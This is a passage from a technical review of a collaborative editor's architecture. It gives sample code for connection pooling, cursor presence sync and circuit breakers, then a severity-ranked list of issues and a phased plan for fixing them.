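The PgBouncer side of that architecture, as a minimal pgbouncer.ini sketch (host names and pool sizes are illustrative):

; pgbouncer.ini - minimal transaction-pooling sketch
[databases]
docs = host=postgres-primary port=5432 dbname=docs

[pgbouncer]
pool_mode = transaction   ; return connection to pool after each transaction
max_client_conn = 2000    ; app-side connections PgBouncer will accept
default_pool_size = 20    ; actual PostgreSQL connections per database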
**No presence/cursor sync**
Severity: MEDIUM — Core feature gap
// Users can't see each other's cursors/selections
// This is a fundamental collaborative editing feature
class PresenceManager {
  constructor(redis) {
    this.redis = redis;
    this.PRESENCE_TTL = 30; // seconds
  }

  async updatePresence(docId, userId, presenceData) {
    const key = `presence:${docId}:${userId}`;
    await this.redis.setEx(
      key,
      this.PRESENCE_TTL,
      JSON.stringify({
        userId,
        cursor: presenceData.cursor,       // { paragraph, offset }
        selection: presenceData.selection, // { anchor, head }
        color: presenceData.color,         // Assigned color for this user
        name: presenceData.displayName,
        lastSeen: Date.now()
      })
    );
    // Notify other clients of the presence update
    await this.redis.publish(
      `presence:${docId}`,
      JSON.stringify({ type: 'presence_update', userId, ...presenceData })
    );
  }

  async getDocumentPresence(docId) {
    // Note: KEYS is O(N) over the whole keyspace - fine at small scale,
    // but production should use SCAN or track members in a per-doc set
    const pattern = `presence:${docId}:*`;
    const keys = await this.redis.keys(pattern);
    if (keys.length === 0) return [];
    const values = await this.redis.mGet(keys);
    return values
      .filter(Boolean)
      .map(v => JSON.parse(v));
  }

  async removePresence(docId, userId) {
    await this.redis.del(`presence:${docId}:${userId}`);
    await this.redis.publish(
      `presence:${docId}`,
      JSON.stringify({ type: 'presence_leave', userId })
    );
  }
}
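On the client, presence updates should be throttled so cursor movement doesn't flood Redis; a sketch assuming a hypothetical `editor` event API and a 100ms interval:

// Sketch: throttle cursor broadcasts (editor API and 100ms are assumptions)
let lastSent = 0;
editor.on('cursorchange', (cursor) => {
  const now = Date.now();
  if (now - lastSent < 100) return; // at most 10 updates/sec
  lastSent = now;
  presenceManager.updatePresence(docId, currentUser.id, {
    cursor,
    selection: editor.getSelection(),
    color: currentUser.color,
    displayName: currentUser.name
  });
});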
**No circuit breakers or graceful degradation**
Severity: HIGH — Cascading failure risk
import CircuitBreaker from 'opossum';

// Without circuit breakers:
// PostgreSQL slows down → all requests wait → servers exhaust their
// connection pools → the entire application becomes unresponsive
// → users see spinning wheels, not helpful errors

const dbCircuitBreaker = new CircuitBreaker(
  async (query) => await db.raw(query),
  {
    timeout: 3000,                // A call fails if it takes longer than 3s
    errorThresholdPercentage: 50, // Open after 50% failures
    resetTimeout: 30000,          // Try again after 30s
    volumeThreshold: 10           // Minimum calls before evaluating
  }
);

dbCircuitBreaker.fallback(async (query) => {
  // Degraded mode: serve from cache if available
  const cached = await redis.get(`query_cache:${hash(query)}`);
  if (cached) {
    metrics.increment('circuit_breaker.cache_hit');
    return JSON.parse(cached);
  }
  // Return a meaningful error instead of hanging
  throw new ServiceUnavailableError(
    'Document service temporarily unavailable. Your changes are saved locally.'
  );
});

dbCircuitBreaker.on('open', () => {
  logger.error('DB circuit breaker OPEN - database unreachable');
  alerting.critical('Database circuit breaker opened');
});
dbCircuitBreaker.on('halfOpen', () => {
  logger.info('DB circuit breaker testing recovery');
});
dbCircuitBreaker.on('close', () => {
  logger.info('DB circuit breaker closed - database recovered');
});
┌────────────────────────────────────────────────────────────────────────┐
│ PRIORITY MATRIX │
├──────────────────────────────────────┬────────────┬────────────────────┤
│ Issue │ Severity │ Fix Complexity │
├──────────────────────────────────────┼────────────┼────────────────────┤
│ CDN caching authenticated responses │ CRITICAL │ Low (config change)│
│ JWT in localStorage (XSS) │ CRITICAL │ Medium │
│ HTML storage (XSS injection) │ CRITICAL │ High │
│ LWW with client clocks │ CRITICAL │ High (CRDT/OT) │
│ No OT/CRDT (document divergence) │ HIGH │ High │
│ 2-second polling │ HIGH │ Medium (Redis) │
│ No WebSocket reconnection │ HIGH │ Medium │
│ Full snapshot storage (data loss) │ HIGH │ High │
│ No circuit breakers │ HIGH │ Low (library) │
│ LB breaks WebSocket routing │ HIGH │ Medium │
│ PostgreSQL as message bus │ HIGH │ Medium │
│ Hot partition (org-based) │ MEDIUM │ Medium │
│ No connection pooling │ MEDIUM │ Low (PgBouncer) │
│ No presence/cursor sync │ MEDIUM │ Medium │
│ No graceful degradation │ MEDIUM │ Low (library) │
│ 24h JWT expiry (too long) │ MEDIUM │ Low │
│ No operation acknowledgment │ MEDIUM │ Medium │
│ No audit log │ LOW │ Low (side effect │
│ │ │ of op log) │
└──────────────────────────────────────┴────────────┴────────────────────┘
Week 1 — Fix critical security issues (no architectural changes required):
1. Move CDN to never cache /api/* routes
2. Migrate JWT to HttpOnly cookies
3. Sanitize document content (stop storing raw HTML)
Week 2-3 — Fix data integrity:
4. Integrate Yjs for CRDT-based sync
5. Switch to operation log storage
6. Add Redis Pub/Sub (eliminate polling)
Week 4-5 — Fix resilience:
7. Implement WebSocket reconnection with op queue
8. Add circuit breakers
9. Deploy PgBouncer
Week 6+ — Scaling improvements:
10. Stateless WebSocket servers
11. Fix partition strategy
12. Add presence/cursor sync
The three issues you can fix today with no architectural changes (CDN caching, localStorage JWT, HTML injection) are also the three that could cause immediate catastrophic data breaches. Start there.